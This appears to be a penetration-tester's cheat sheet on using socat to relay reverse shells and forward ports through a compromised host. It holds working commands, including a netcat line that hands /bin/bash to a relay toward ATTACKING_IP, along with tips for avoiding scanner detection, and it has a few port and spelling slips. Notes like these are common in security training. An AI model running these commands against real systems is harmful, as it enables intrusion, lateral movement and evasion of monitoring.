Socat

Overview

Socat can be used create port forwards and relays.

For example if you are attempting to get a shell on a target that does not have a direct connection back to your attacking computer, you could use socat to set up a relay on the currently compromised machine. This listens for the reverse shell from the target and then forwards it immediately back to the attacking box.

Reverse Shell Relay with Socat

First download the socat binary (Linux / Windows) to the target machine.

Start nc listener on your machine on 1333

Start the socat relay on the target machine

./socat tcp-l:8000 tcp:ATTACKING_IP:1333 &

• tcp-l:8000

  • used to create the first half of the connection -- an IPv4 listener on tcp port 8000 of the target machine.

• tcp:ATTACKING_IP:443

  • connects back to our local IP on port 443. The ATTACKING_IP obviously needs to be filled in correctly for this to work

From here we can create a new reverse shell back to the attacking machine on the targets local 8000 port

./nc-adot8 127.0.0.1 8000 -e /bin/bash

Port Forwarding - Noisy

You can set up a port forward with socat by opening up up a listening port on the compromised server, and redirecting whatever comes into it to the target server

For example, if the compromised server is 172.16.0.5 and the target is port 3306 of 172.16.0.10, we could use the following command on the compromised server.

./socat tcp-l:33060,fork,reuseaddr tcp:172.16.0.10:3306 &

• fork

  • used to put every connection into a new process

• reusedaddr

  • makes the port stay open after a connection is made to it

We can now connect to port 33060 on the compromised server (172.16.0.5) and have our traffic relayed to our intended target 172.16.0.10:3306.

Port Forwarding - Quiet

The first method could be picked up by any kind of host or network scanning because it's literally opening up an external port (not stealthy at all).

First we need to open up ports 8001 and 8000 on our attacking machine to create a local port relay. What goes into one of them comes out of the other.

socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &

Next on the compromised server we run this to create a link between port 8000 on our attacking machine, and port 80 on the intended target (172.16.0.10)

This will allow us to go to localhost:8000 on our attacking machine's web browser to load the webpage served by the target: 172.16.0.10:80

./socat tcp:ATTACKING_IP:8001 tcp:TARGET_IP:TARGET_PORT,fork &
./socat tcp:10.50.73.2:8001 tcp:172.16.0.10:80,fork &